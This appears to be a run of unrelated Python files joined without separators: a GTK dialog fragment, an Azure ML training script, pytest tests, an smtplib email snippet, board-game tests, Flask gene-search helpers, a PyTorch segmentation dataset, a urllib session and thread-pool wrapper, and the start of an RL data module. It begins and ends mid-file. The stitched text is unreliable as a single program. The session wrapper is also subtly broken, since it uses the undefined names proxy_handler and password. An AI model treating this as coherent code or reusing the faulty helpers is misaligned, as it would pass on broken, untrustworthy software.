self.onCancel) scrolledwindow = Gtk.ScrolledWindow() scrolledwindow.set_hexpand(True) scrolledwindow.set_vexpand(True) area.add(scrolledwindow) self.textview = Gtk.TextView() self.textbuffer = self.textview.get_buffer() lines = '\n'.join(confFile.validUnsupportedLines[1:]) self.textbuffer.set_text(lines) scrolledwindow.add(self.textview) self.show_all() def onCancel(self, widget): self.response(Gtk.ResponseType.CANCEL) def onConfirm(self, widget): self.response(Gtk.ResponseType.OK) """ Copyright (C) Microsoft Corporation. All rights reserved.​ ​ Microsoft Corporation (“Microsoft”) grants you a nonexclusive, perpetual, royalty-free right to use, copy, and modify the software code provided by us ("Software Code"). You may not sublicense the Software Code or any use of it (except to your affiliates and to vendors to perform work on your behalf) through distribution, network access, service agreement, lease, rental, or otherwise. This license does not purport to express any claim of ownership over data you may have shared with Microsoft in the creation of the Software Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted herein, whether by implication, estoppel or otherwise. ​ ​ THE SOFTWARE CODE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL MICROSOFT OR ITS LICENSORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THE SOFTWARE CODE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """ from azureml.core.run import Run from azureml.core import Dataset, Datastore, Workspace import os import argparse from train import train_model, get_model_metrics from train_data_drift import train_autoencoder, autoencoder_get_model_metrics import numpy as np from util.model_helper import get_latest_model import tensorflow.keras as k from sklearn.model_selection import train_test_split import matplotlib.pyplot as plt def register_dataset( aml_workspace: Workspace, dataset_name: str, datastore_name: str, file_path: str ) -> Dataset: datastore = Datastore.get(aml_workspace, datastore_name) dataset = Dataset.Tabular.from_delimited_files(path=(datastore, file_path)) dataset = dataset.register(workspace=aml_workspace, name=dataset_name, create_new_version=True) return dataset def main(): print("Running train_aml.py") parser = argparse.ArgumentParser("train") parser.add_argument( "--model_name", type=str, help="Name of the Model", default="mnist_model.h5", ) parser.add_argument( "--autoencoder_name", type=str, help="Name of the autoencoder Model", default="data_drift_model.h5", ) parser.add_argument( "--step_output", type=str, help=("output for passing data to next step") ) parser.add_argument( "--dataset_version", type=str, help=("dataset version") ) parser.add_argument( "--data_file_path", type=str, help=("data file path, if specified,\ a new version of the dataset will be registered") ) parser.add_argument( "--caller_run_id", type=str, help=("caller run id, for example ADF pipeline run id") ) parser.add_argument( "--dataset_name", type=str, help=("Dataset name. Dataset must be passed by name\ to always get the desired dataset version\ rather than the one used while the pipeline creation") ) parser.add_argument( "--label_dataset_name", type=str, help=("Dataset name. Dataset must be passed by name\ to always get the desired dataset version\ rather than the one used while the pipeline creation") ) parser.add_argument( "--n_epochs", type=int, help=("n_epochs") ) parser.add_argument( "--batch_size", type=int, help=("batch size") ) parser.add_argument( "--autoencoder_n_epochs", type=int, help=("n_epochs") ) parser.add_argument( "--autoencoder_batch_size", type=int, help=("batch size") ) args = parser.parse_args() print("Argument [model_name]: %s" % args.model_name) print("Argument [autoencoder_name]: %s" % args.autoencoder_name) print("Argument [step_output]: %s" % args.step_output) print("Argument [dataset_version]: %s" % args.dataset_version) print("Argument [data_file_path]: %s" % args.data_file_path) print("Argument [caller_run_id]: %s" % args.caller_run_id) print("Argument [dataset_name]: %s" % args.dataset_name) print("Argument [label_dataset_name]: %s" % args.label_dataset_name) model_name = args.model_name autoencoder_name = args.autoencoder_name step_output_path = args.step_output dataset_version = args.dataset_version data_file_path = args.data_file_path dataset_name = args.dataset_name label_dataset_name = args.label_dataset_name n_epochs = args.n_epochs batch_size = args.batch_size autoencoder_n_epochs = args.autoencoder_n_epochs autoencoder_batch_size = args.autoencoder_batch_size run = Run.get_context() exp = run.experiment ws = run.experiment.workspace tag_name = 'experiment_name' autoencoder = get_latest_model( autoencoder_name, tag_name, exp.name, ws) # Get the dataset if (dataset_name): if (data_file_path == 'none'): dataset = Dataset.get_by_name(run.experiment.workspace, dataset_name, dataset_version) # NOQA: E402, E501 else: dataset = register_dataset(run.experiment.workspace, dataset_name, os.environ.get("DATASTORE_NAME"), data_file_path) else: e = ("No dataset provided") print(e) raise Exception(e) # Link dataset to the step run so it is trackable in the UI run.input_datasets['training_data'] = dataset run.parent.tag("dataset_id", value=dataset.id) dataset2 = Dataset.get_by_name(run.experiment.workspace, dataset_name) mount_context = dataset2.mount() mount_context.start() # this will mount the file streams data = np.load( mount_context.mount_point + '/image_data_by_person_all4_no_filter_2500_20prc.npy') mount_context.stop() # this will unmount the file streams label_dataset = Dataset.get_by_name( run.experiment.workspace, label_dataset_name ) mount_context = label_dataset.mount() mount_context.start() # this will mount the file streams labels = np.load( mount_context.mount_point + '/labels_by_person_all4_no_filter_2500_20prc.npy') mount_context.stop() # this will unmount the file streams labelSubset = labels dataSubset = data dataSubset = dataSubset.reshape(len(dataSubset), 57, 86, 1) labelSubset = k.utils.to_categorical(labelSubset) x_train, x_test, y_train, y_test = train_test_split( dataSubset, labelSubset, test_size=0.2, shuffle=True, stratify=labelSubset ) # Train the model train_meta_data = train_model( x_train, y_train, x_test, y_test, n_epochs, batch_size ) model = train_meta_data[0] hist_train = train_meta_data[1] # Evaluate and log the metrics returned from the train function metrics = get_model_metrics(model, x_test, y_test) run.log("test loss", metrics[0]) run.log("test accuracy", metrics[1]) run.parent.log("test loss", metrics[0]) run.parent.log("test accuracy", metrics[1]) # plot the graph of training vs accuracy plt.style.use("ggplot") plt.figure() plt.plot( np.arange(0, n_epochs), hist_train.history["loss"], label="train_loss" ) plt.plot( np.arange(0, n_epochs), hist_train.history["val_loss"], label="val_loss" ) plt.plot( np.arange(0, n_epochs), hist_train.history["accuracy"], label="train_acc" ) plt.plot( np.arange(0, n_epochs), hist_train.history["val_accuracy"], label="val_acc" ) plt.title("Loss/Accuracy vs Epochs") plt.xlabel("No of Epochs") plt.ylabel("Loss/Accuracy") plt.legend() run.log_image("metrics plot", plot=plt) run.parent.log_image("metrics plot", plot=plt) # Pass model file to next step os.makedirs(step_output_path, exist_ok=True) model_output_path = os.path.join(step_output_path, model_name) model.save(model_output_path) if (autoencoder is None): autoencoder_and_history = train_autoencoder( x_train, x_train, autoencoder_n_epochs, autoencoder_batch_size ) autoencoder = autoencoder_and_history[0] hist_auto = autoencoder_and_history[1] test_loss = autoencoder_get_model_metrics( autoencoder, hist_auto, x_test ) run.log('autoencoder training loss', test_loss[0]) run.log('autoencoder test loss', test_loss[1]) run.parent.log('autoencoder training loss', test_loss[0]) run.parent.log('autoencoder test loss', test_loss[1]) plt.style.use("ggplot") plt.figure() plt.plot( np.arange(0, autoencoder_n_epochs), hist_auto.history["loss"], label="train_loss" ) plt.plot( np.arange(0, autoencoder_n_epochs), hist_auto.history["val_loss"], label="val_loss" ) plt.title("Loss/Accuracy vs Epochs") plt.xlabel("No of Epochs") plt.ylabel("Loss/Accuracy") plt.legend() run.log_image("metrics plot", plot=plt) run.parent.log_image("metrics plot", plot=plt) autencoder_output_path = os.path.join(step_output_path, autoencoder_name ) autoencoder.save(autencoder_output_path) print('autencoder saved') else: print('autencoder model already exists') # Also upload model file to run outputs for history os.makedirs('outputs', exist_ok=True) output_path = os.path.join('outputs', model_name) model.save(output_path) run.tag("run_type", value="train") print(f"tags now present for run: {run.tags}") run.complete() if __name__ == '__main__': main() # -*- coding: utf-8 -*- """ Tests for common elements found in _BaseVMCView """ import pytest # pylint: disable=import-error from vertical_multi_columns.views import EvenVMCView, _BaseVMC # Testing method pad_columns # What to test # The method "pad_columns" generates columns equal in length to the longest column # - all columns already equal # - all columns empty # - first column empty # - last column empty # - lots of columns def test_pad_columns_already_same(columns_same_length_4): """Ensure columns already the same length are not padded any further""" instance = _BaseVMC() columns, max_column = instance.pad_columns(columns_same_length_4) assert max_column == 4 for i in columns: assert (len(i)) == 4 def test_pad_first_column_empty(first_column_empty_5): """Ensure edge case where first column in empty is padded correctly""" instance = _BaseVMC() columns, max_column = instance.pad_columns(first_column_empty_5) assert max_column == 5 for i in columns: assert (len(i)) == 5 def test_pad_all_columns_empty(all_columns_empty): """Ensure edge case where all columns are empty can be handled""" instance = _BaseVMC() columns, max_column = instance.pad_columns(all_columns_empty) assert max_column == 0 for i in columns: assert (len(i)) == 0 def test_pad_last_column_empty(last_column_empty_2): """Ensure edge case where last column in empty is padded correctly""" instance = _BaseVMC() columns, max_column = instance.pad_columns(last_column_empty_2) assert max_column == 2 for i in columns: assert (len(i)) == 2 def test_pad_lots_of_columns(columns_many): """Ensure edge case where there are more columns than would be normally expected are handled correctly""" instance = _BaseVMC() columns, max_column = instance.pad_columns(columns_many(1000, 5000)) assert max_column == 1000 for i in columns: assert (len(i)) == 1000 # Testing method build_new_rows # What to test # The method "build_new_rows" generates a set of rows that correspond vertically to the passed columns # - number of rows corresponds to max_column value # - each row contains the number of elements specified by the setting number_of_columns # - values in rows are the same as the corresponding cell in columns # The next two tests are verifying the same thing. # I've included them for my own documentation. # They demonstrate using a parametrized fixture versus passing multiple fixtures with getfixturevalue() # NB ... In some cases, I'm instantiating EvenVMCView to get access to _BaseVMCView methods for testing since # that is the only way I can pass in number_of_columns def test_build_using_parametrized_fixture(padded_columns): """Ensure rows are built correctly. Using one method for parametrized fixtures.""" original_columns = padded_columns[0] out_column_length = padded_columns[1] num_cols = padded_columns[2] instance = EvenVMCView(num_columns=num_cols) # using EvenVMCView but for test, only interested in _BaseVMC rows = instance.build_new_rows(original_columns, out_column_length) assert len(rows) == out_column_length # number of rows corresponds to max length of the original columns for row in rows: assert ( len(row) == instance.number_of_columns ) # each row contains the number of elements specified by the setting number_of_columns # SUSAN - Rework this reversed_columns = [] for num in range(instance.number_of_columns): col = [rows[row][num] for row in range(out_column_length)] reversed_columns.append(col) assert reversed_columns == original_columns # when "unbuilt" the result should be identical to the original columns @pytest.mark.parametrize("padded_columns", [("fixture_padded_columns_4"), ("fixture_padded_columns_16")]) def test_build_using_getfixturevalue(padded_columns, request): """Ensure rows are built correctly. This is the same test as above using a different method of parametrizing fixtures""" padded_columns = request.getfixturevalue(padded_columns) original_columns = padded_columns[0] out_column_length = padded_columns[1] num_cols = padded_columns[2] instance = EvenVMCView(num_columns=num_cols) # using EvenVMCView but for test, only interested in _BaseVMC rows = instance.build_new_rows(original_columns, out_column_length) assert len(rows) == out_column_length # number of rows corresponds to max length of the original columns for row in rows: assert ( len(row) == instance.number_of_columns ) # each row contains the number of elements specified by the setting number_of_columns reversed_columns = [] for num in range(instance.number_of_columns): col = [rows[row][num] for row in range(out_column_length)] reversed_columns.append(col) assert reversed_columns == original_columns # when "unbuilt" the result should be identical to the original columns # Import smtplib for the actual sending function import smtplib # Import the email modules we'll need from email.mime.text import MIMEText # Variables template = "templates/hello_world.html" me = "" you = "" # Open a plain text file for reading. For this example, assume that # the text file contains only ASCII characters. fp = open(template, "rb") # Create a text/plain message msg = MIMEText(fp.read()) fp.close() # me == the sender's email address # you == the recipient's email address msg["Subject"] = "The contents of templates/hello_world.html" msg["From"] = me msg["To"] = you # Send the message via our own SMTP server, but don't include the # envelope header. s = smtplib.SMTP("localhost") s.sendmail(me, you, msg.as_string()) s.quit() from part1 import ( gamma_board, gamma_busy_fields, gamma_delete, gamma_free_fields, gamma_golden_move, gamma_golden_possible, gamma_move, gamma_new, ) """ scenario: test_random_actions uuid: 694912875 """ """ random actions, total chaos """ board = gamma_new(4, 4, 3, 7) assert board is not None assert gamma_move(board, 1, 3, 2) == 1 assert gamma_move(board, 1, 0, 3) == 1 assert gamma_move(board, 2, 2, 2) == 1 assert gamma_golden_possible(board, 2) == 1 assert gamma_move(board, 1, 3, 3) == 1 assert gamma_move(board, 1, 0, 0) == 1 board883444428 = gamma_board(board) assert board883444428 is not None assert board883444428 == ("1..1\n" "..21\n" "....\n" "1...\n") del board883444428 board883444428 = None assert gamma_move(board, 2, 0, 2) == 1 assert gamma_move(board, 2, 1, 2) == 1 assert gamma_move(board, 3, 0, 2) == 0 board488204880 = gamma_board(board) assert board488204880 is not None assert board488204880 == ("1..1\n" "2221\n" "....\n" "1...\n") del board488204880 board488204880 = None assert gamma_move(board, 1, 1, 1) == 1 assert gamma_free_fields(board, 1) == 8 board100631094 = gamma_board(board) assert board100631094 is not None assert board100631094 == ("1..1\n" "2221\n" ".1..\n" "1...\n") del board100631094 board100631094 = None assert gamma_move(board, 2, 2, 3) == 1 assert gamma_move(board, 2, 2, 1) == 1 assert gamma_move(board, 3, 0, 3) == 0 assert gamma_move(board, 1, 2, 0) == 1 assert gamma_move(board, 2, 0, 3) == 0 assert gamma_move(board, 3, 0, 1) == 1 assert gamma_move(board, 3, 0, 3) == 0 assert gamma_move(board, 1, 0, 3) == 0 assert gamma_move(board, 2, 0, 3) == 0 assert gamma_move(board, 2, 2, 2) == 0 assert gamma_golden_possible(board, 2) == 1 assert gamma_move(board, 3, 3, 1) == 1 assert gamma_move(board, 3, 2, 0) == 0 assert gamma_free_fields(board, 3) == 3 assert gamma_move(board, 1, 1, 1) == 0 assert gamma_move(board, 1, 2, 2) == 0 assert gamma_move(board, 2, 0, 3) == 0 assert gamma_move(board, 3, 2, 3) == 0 assert gamma_move(board, 1, 0, 3) == 0 assert gamma_move(board, 2, 3, 1) == 0 assert gamma_move(board, 3, 3, 2) == 0 assert gamma_golden_possible(board, 3) == 1 assert gamma_move(board, 1, 1, 1) == 0 assert gamma_move(board, 1, 3, 2) == 0 assert gamma_move(board, 2, 3, 1) == 0 assert gamma_busy_fields(board, 2) == 5 assert gamma_free_fields(board, 2) == 3 assert gamma_move(board, 3, 2, 3) == 0 assert gamma_move(board, 1, 0, 3) == 0 assert gamma_move(board, 1, 0, 2) == 0 assert gamma_move(board, 2, 0, 1) == 0 assert gamma_move(board, 3, 3, 1) == 0 assert gamma_move(board, 2, 2, 3) == 0 assert gamma_move(board, 3, 1, 3) == 1 assert gamma_move(board, 1, 0, 1) == 0 assert gamma_free_fields(board, 1) == 2 assert gamma_move(board, 2, 0, 3) == 0 assert gamma_golden_possible(board, 2) == 1 gamma_delete(board) from flask import request, Blueprint from caendr.models.sql import Homolog, WormbaseGeneSummary from sqlalchemy import or_, func from logzero import logger def get_gene(query: str): """Lookup a single gene Lookup gene in the wormbase summary gene table. Args: query (str): Query string Returns: result (dict): List of dictionaries describing the homolog. """ query = request.args.get('query') or query query = str(query).lower() # First identify exact match result = WormbaseGeneSummary.query.filter(or_(func.lower(WormbaseGeneSummary.locus) == query, func.lower(WormbaseGeneSummary.sequence_name) == query, func.lower(WormbaseGeneSummary.gene_id) == query)) \ .first() if not result: result = WormbaseGeneSummary.query.filter(or_(func.lower(WormbaseGeneSummary.locus).startswith(query), func.lower(WormbaseGeneSummary.sequence_name).startswith(query), func.lower(WormbaseGeneSummary.gene_id).startswith(query))) \ .first() return result def search_genes(query: str): """Query gene Query genes in the wormbase summary gene table. Args: query (str): Query string Returns: results (list): List of dictionaries with gene results. """ results = WormbaseGeneSummary.query.filter(or_(func.lower(WormbaseGeneSummary.locus).startswith(query), func.lower(WormbaseGeneSummary.sequence_name).startswith(query), func.lower(WormbaseGeneSummary.gene_id).startswith(query))) \ .limit(10) \ .all() results = [x.to_json() for x in results] return results def search_homologs(query: str): """Query homolog Query the homologs database and return C. elegans homologs. Args: query (str): Query string Returns: results (list): List of dictionaries describing the homolog. """ query = request.args.get('query') or query query = query.lower() results = Homolog.query.filter((func.lower(Homolog.homolog_gene)).startswith(query)) \ .limit(10) \ .all() results = [x.unnest().to_json() for x in results] return results def combined_search(query: str): """Combines homolog and gene searches Args: query (str): Query string Returns: results (list): List of dictionaries describing the homolog. """ return (search_genes(query) + search_homologs(query))[0:10] def gene_variants(query: str): """Return a list of variants within a gene. Args: query: gene name or ID Returns: results (list): List of variants within a gene """ gene_record = get_gene(query) gene_variants = variant_query(gene_record.interval) #for row in gene_variants: # Filter ANN for annotations for gene # row['ANN'] = [x for x in row['ANN'] if gene_record.gene_id == x['gene_id']] return gene_variants def search_interval(gene: str): result = get_gene(gene) if result: return {'result': [ {"chromosome": result.chrom, 'start': result.start, 'end': result.end} ] } else: return {'error': 'not found'}dataset.py import os import torch.utils.data as data import torchvision.transforms as transforms import numpy as np from PIL import Image from imutils import paths def normalize(x): """Scale image to range 0..1 for correct plot""" x_max = np.percentile(x, 98) x_min = np.percentile(x, 2) if x_max == x_min: x = x/255.0 else: x = (x - x_min) / (x_max - x_min) x = x.clip(0, 1) return x def get_key(my_dict,val): for key, value in my_dict.items(): if (val == value).all(): return key return 'None' def read_lines_txt(dir='D:\\GIT\\00Dataset\\Segmentation\\camvid\\label_digit.txt'): return open(dir,'r').readlines() def save_dict2txt(dict,dir="dict.txt"): f = open(dir,"w") for key in dict: f.write("%s %d\n"%(key, dict[key])) f.close() def dataset_mask_processing(dir = 'D:\\GIT\\00Dataset\\Segmentation\\camvid\\LabeledApproved_full',color_list = 'D:\\GIT\\00Dataset\\Segmentation\\camvid\\label_colors.txt',label_digit_dir='D:\\GIT\\00Dataset\\Segmentation\\camvid\\label_digit.txt'): save_folder = dir+'_masks' if not os.path.exists(save_folder): os.mkdir(save_folder) lines = read_lines_txt(color_list) label_colors = {} for line in lines: items = line.split(' ') label = items[-1].replace('\n','') rgb = [int(x) for x in items[:-1]] if not len(rgb)==3: print('error') label_colors[label]=rgb mask_paths = list(paths.list_images(dir)) labels = list(label_colors.keys()) label_digit = {labels[i]:i for i in range(0,len(labels))} label_digit.update({'None':len(labels)}) save_dict2txt(label_digit,label_digit_dir) print('label digit ',label_digit) idx = 0 for p in mask_paths: fn = '_'.join(p.split(os.path.sep)[-1].split('.')[0].split('_')[:-1]) + '.png' if not os.path.isfile(os.path.join(save_folder,fn)): mask = np.array(Image.open(p)) h,w,c = mask.shape mask_label = np.zeros((h*w,1)).astype(np.uint8) mask = mask.reshape(h*w,c) for i in range(h*w): rgb = mask[i,:] key = get_key(label_colors,rgb) value = label_digit[key] mask_label[i] = value mask_label = mask_label.reshape(h,w) mask_label = Image.fromarray(mask_label) mask_label.save(os.path.join(save_folder,fn)) if idx%50 == 0: print('%d image processed.....'%idx) idx += 1 class Resize(object): def __init__(self, size): self.size = size def __call__(self, sample): img, mask = sample['image'], sample['mask'] img, mask = img.resize((self.size, self.size), resample=Image.BILINEAR), mask.resize((self.size, self.size), resample=Image.BILINEAR) return {'image': img, 'mask': mask} class RandomCrop(object): def __init__(self, size): self.size = size def __call__(self, sample): img, mask = sample['image'], sample['mask'] img, mask = img.resize((256, 256), resample=Image.BILINEAR), mask.resize((256, 256), resample=Image.BILINEAR) h, w = img.size new_h, new_w = self.size, self.size top = np.random.randint(0, h - new_h) left = np.random.randint(0, w - new_w) img = img.crop((left, top, left + new_w, top + new_h)) mask = mask.crop((left, top, left + new_w, top + new_h)) return {'image': img, 'mask': mask} class ColorJitter(object): def __init__(self, prob): self.prob = prob self.colorJitter = transforms.ColorJitter(0.1,0.1,0.1) def __call__(self, sample): if np.random.random_sample() < self.prob: img, mask = sample['image'], sample['mask'] img = self.colorJitter(img) return {'image': img, 'mask': mask} else: return sample class RandomFlip(object): def __init__(self, prob): self.prob = prob self.flip = transforms.RandomHorizontalFlip(1.) def __call__(self, sample): if np.random.random_sample() < self.prob: img, mask = sample['image'], sample['mask'] img = self.flip(img) mask = self.flip(mask) return {'image': img, 'mask': mask} else: return sample class ToTensor(object): def __init__(self): self.tensor = transforms.ToTensor() def __call__(self, sample): img, mask = sample['image'], sample['mask'] img, mask = self.tensor(img), self.tensor(mask) return {'image': img, 'mask': mask} #inputs and masks have the same names class PairDataset(data.Dataset): lines = read_lines_txt('D:\\GIT\\00Dataset\\Segmentation\\camvid\\label_digit.txt') CLASSES = [line.split(' ')[0].lower() for line in lines] print('CLASSES ',CLASSES) ''' CLASSES = ['sky', 'building', 'pole', 'road', 'pavement', 'tree', 'signsymbol', 'fence', 'car', 'pedestrian', 'bicyclist', 'unlabelled'] ''' def __init__(self, root_dir, images_dir,masks_dir,train=True,camvid=False, data_augmentation=True,classes=['building','tree','signsymbol','wall']):#classes=['building', 'tree','signsymbol'] self.root_dir = root_dir self.train = train self.image_list = sorted(os.listdir(os.path.join(root_dir, images_dir))) self.mask_list = sorted(os.listdir(os.path.join(root_dir, masks_dir))) self.transform = transforms.Compose( [RandomFlip(0.5), RandomCrop(224), ColorJitter(0.5), ToTensor()]) if not (train and data_augmentation): self.transform = transforms.Compose([Resize(224), ToTensor()]) self.root_dir = root_dir self.images_dir = images_dir self.masks_dir = masks_dir self.data_augmentation = data_augmentation self.class_values = [self.CLASSES.index(cls.lower()) for cls in classes] self.camvid = camvid def __len__(self): return len(self.image_list) def __getitem__(self, item): img_name = os.path.join(self.root_dir, self.images_dir, self.image_list[item]) mask_name = os.path.join(self.root_dir, self.masks_dir, self.mask_list[item]) img = Image.open(img_name) mask = Image.open(mask_name) img = img.convert('RGB') mask = mask.convert('L') if self.camvid: masks = [(np.asarray(mask) == v) for v in self.class_values] mask = np.stack(masks, axis=-1) mask = mask.sum(axis=-1) mask = Image.fromarray(np.uint8(mask * 255) , 'L') sample = {'image': img, 'mask': mask} sample = self.transform(sample) return sample class CustomDataset(data.Dataset): def __init__(self, root_dir): self.image_list = sorted(os.listdir(root_dir)) self.transform = transforms.Compose([transforms.Resize((224, 224)), transforms.ToTensor()]) self.root_dir = root_dir def __len__(self): return len(self.image_list) def __getitem__(self, item): img_name = '{}/{}'.format(self.root_dir, self.image_list[item]) img = Image.open(img_name) sample = img.convert('RGB') sample = self.transform(sample) return sample if __name__ == "__main__": dataset_mask_processing()core/session.py # -*- coding:utf-8 -*- """ 用于实现请求 """ import sys import time import inspect from urllib import request from concurrent.futures import ThreadPoolExecutor from concurrent.futures import ProcessPoolExecutor from concurrent import futures class SessionImpl(object): """ """ K_PROXY_HANDLER = 1 # 代理 K_COOKIE_HANDLER = 2 # 缓存 K_AUTH_HANDLER = 3 # 账号验证(代理的依然是1) K_REDIRECT_HANDLER = 4 # 重定向 def __init__(self, **kwargs): # 记录当前的缓存请求 self.__cache_handlers = {} def _create_proxy_handler(self, key, proxy_url): """ 创建代理请求 @param key: "http" or "https" @param proxy_url: "ip:port" or "http://ip:port" or "user:password@ip:port" """ proxy_cfg = {} proxy_cfg[key] = proxy_url proxy_handler = request.ProxyHandler(proxy_cfg) self.__cache_handlers[SessionImpl.K_PROXY_HANDLER] = proxy_handler def _create_cookie_handler(self, cookiejar=None): """ 创建cookies请求 @param cookiejar: 默认http.cookiejar.CookieJar """ cookie_header = request.HTTPCookieProcessor(cookiejar) self.__cache_handlers[SessionImpl.K_COOKIE_HANDLER] = cookie_header def _create_auth_handler(self, passwdmgr, is_proxy=False): """ 创建具有客户端授权的请求 @param passwdmgr: HTTPPasswordMgrWithDefaultRealm对象 @param is_proxy: 是否是代理 """ if is_proxy: proxy_handler = request.ProxyBasicAuthHandler(passwdmgr) self.__cache_handlers[SessionImpl.K_PROXY_HANDLER] = proxy_handler else: auth_handler = request.HTTPBasicAuthHandler(passwdmgr) self.__cache_handlers[SessionImpl.K_AUTH_HANDLER] = proxy_handler def _create_redirect_handler(self): """ 创建支持重定向的请求 """ redirect_handler = request.HTTPRedirectHandler() self.__cache_handlers[SessionImpl.K_REDIRECT_HANDLER] = redirect_handler def _create_passwd_mgr(self, user, passwd, url): """ 创建密码管理对象 @param user: 账号 @param passwd: 密码 @param url: 地址 """ passwdmgr = request.HTTPPasswordMgrWithDefaultRealm() passwdmgr.add_password(None, url, user, password) return passwdmgr def open_proxy(self, key, url): """ 打开代理设置 """ self._create_proxy_handler(key, url) def open_proxy_auth(self, url, user, passwd): """ 打开代理设置- 指定账号密码 """ passwdmgr = self._create_passwd_mgr(user, passwd, url) self._create_auth_handler(passwdmgr, is_proxy=True) def open_cookices(self, cookiejar=None): """ 打开cookie设置 """ self._create_cookie_handler(cookiejar) def open_http_auth(self, url, user, passwd): """ 打开客户端验证 """ passwdmgr = self._create_passwd_mgr(user, passwd, url) self._create_auth_handler(passwdmgr) def open_redirect(self): """ 打开重定向 """ self._create_redirect_handler() def _open(self, req, timeout=30, opener=None): """ 打开的接口,外部不用调用 """ if opener is None: opener = self.build_opener() return opener.open(req, timeout=timeout) def build_opener(self): """ 创建opener """ return request.build_opener(*list(self.__cache_handlers.values())) class Session(SessionImpl): def __init__(self): super(Session, self).__init__() self.__cache_headers = {} self.__cache_data = None self.__cache_opener = None def set_cookie(self, key, value): pass def set_header(self, key, value): """ 设置请求头 """ self.__cache_headers[key] = value def get(self, url, timeout=30, use_cache_opener=False): """ GET请求 """ if not use_cache_opener or self.__cache_opener is None: self.__cache_opener = self.build_opener() req = request.Request(url, data=self.__cache_data, headers=self.__cache_headers, method="GET") return self._open(req, timeout, opener=self.__cache_opener) def post(self, url, timeout=30, use_cache_opener=False): """ POST请求 """ if not use_cache_opener or self.__cache_opener is None: self.__cache_opener = self.build_opener() req = request.Request(url, data=self.__cache_data, headers=self.__cache_headers, method="POST") return self._open(req, timeout, opener=self.__cache_opener) class SessionRunable: """ Session多线程/进程执行包装类 """ def __init__(self): pass def run(self, **kwargs): pass def exception(self, e): pass def _run_thread_impl(runable_cls, **kwargs): """ 线程执行包装 """ # 先生成对象 runable_obj = runable_cls() try: # 执行 runable_obj.run(**kwargs) except Exception as e: # 异常反馈 runable_obj.exception(e) def _run_process_impl(run_cls_name, run_cls_module, **kwargs): """ 进程执行包装,由于进程启动不能像线程那样可以传递对象 """ try: # 非专业实现... # 先根据模块名找到对应的模块 # 然后根据类名获取类 # 最后创建类对象 runable_module = sys.modules[run_cls_module] runable_cls = getattr(runable_module, run_cls_name) runable_obj = runable_cls() try: # 执行 runable_obj.run(**kwargs) except Exception as e: # 异常反馈 runable_obj.exception(e) except Exception as e: # 这个理论上没人看得到。。。 print("[process] error:{0}".format(e)) class SessionMgr: """ 支持多线程或者多进程执行Session请求的封装类 """ def __init__(self, runable_cls, num_of_pool, is_thread=True): """ @param runable_cls: 请求的包装类,用于实现外部控制 @param num_of_pool: 池的数量,线程or进程 @param is_thread: 默认为线程,False则使用进程 """ if not issubclass(runable_cls, SessionRunable): raise TypeError("runable_cls must be extends from SessionRunable") self.mSessionRunableCls = runable_cls self.mPoolObj = None self.mRunningFlag = False self.mIsThreadMode = is_thread if is_thread: self.mPoolObj = ThreadPoolExecutor(num_of_pool) else: self.mPoolObj = ProcessPoolExecutor(num_of_pool) def once(self, num, **kwargs): """ 单次执行 @param num: 同时执行多少个,每个执行完就退出 @param kwargs: 外部传给执行类的参数 """ jobs = [] # 区分线程和进程的启动方式 if self.mIsThreadMode: _run_impl = _run_thread_impl _run_cls = self.mSessionRunableCls else: _run_impl = _run_process_impl _run_cls = self.mSessionRunableCls.__name__ _run_mod = self.mSessionRunableCls.__module__ for i in range(num): if self.mIsThreadMode: jobs.append(self.mPoolObj.submit(_run_impl, _run_cls, **kwargs)) else: jobs.append(self.mPoolObj.submit(_run_impl, _run_cls, _run_mod, **kwargs)) futures.wait(jobs) def loop(self, num, **kwargs): """ 循环执行 @param num: 同时执行num个,每个执行完继续执行 @param kwargs: 外部传给执行类的参数 """ self.mRunningFlag = True enable_task_num = num jobs = [] # 区分线程和进程的启动方式 if self.mIsThreadMode: _run_impl = _run_thread_impl _run_cls = self.mSessionRunableCls else: _run_impl = _run_process_impl _run_cls = self.mSessionRunableCls.__name__ _run_mod = self.mSessionRunableCls.__module__ while self.mRunningFlag: for i in range(enable_task_num): if self.mIsThreadMode: jobs.append(self.mPoolObj.submit(_run_impl, _run_cls, **kwargs)) else: jobs.append(self.mPoolObj.submit(_run_impl, _run_cls, _run_mod, **kwargs)) enable_task_num = 0 while self.mRunningFlag and enable_task_num == 0: temp_done_jobs = [] for job in jobs: if job.done(): enable_task_num += 1 temp_done_jobs.append(job) # 都没有完成就等待 if enable_task_num == 0: time.sleep(1) # 移除已完成的 for job in temp_done_jobs: jobs.remove(job) j0rd1smit/lighting-RL from typing import Callable, List, Optional, Tuple import gym from gym.vector import SyncVectorEnv from pytorch_lightning import Callback from lightning_rl.callbacks.EnvironmentEvaluationCallback import EnvironmentEvaluationCallback from lightning_rl.callbacks.OnlineDataCollectionCallback import OnlineDataCollectionCallback, PostProcessFunction from lightning_rl.dataset.OnlineDataModule import OnlineDataModule from lightning_rl.dataset.samplers.EntireBufferSampler import EntireBufferSampler from lightning_rl.dataset.samplers.UniformSampler import UniformSampler from lightning_rl.environmental.EnvironmentLoop import EnvironmentLoop from lightning_rl.storage.UniformReplayBuffer import UniformReplayBuffer from lightning_rl.types import FetchAgentInfo, Policy EnvBuilder = Callable[[], gym.Env] def on_policy_dataset( env_builder: EnvBuilder, select_online_actions: Policy, fetch_agent_info: Optional[FetchAgentInfo] = None, # batch batch_size: int = 4000, # online callback n_envs: int = 10, steps_per_epoch: int = 5000, # post processing post_process_function: Optional[PostProcessFunction] = None, ) -> Tuple[OnlineDataModule, List[Callback]]: buffer = UniformReplayBuffer(batch_size) samples_per_epoch = steps_per_epoch * batch_size sampler = EntireBufferSampler(buffer, samples_per_epoch) data_module = OnlineDataModule(buffer, batch_size, sampler=sampler, pin_memory=True, n_workers=0) 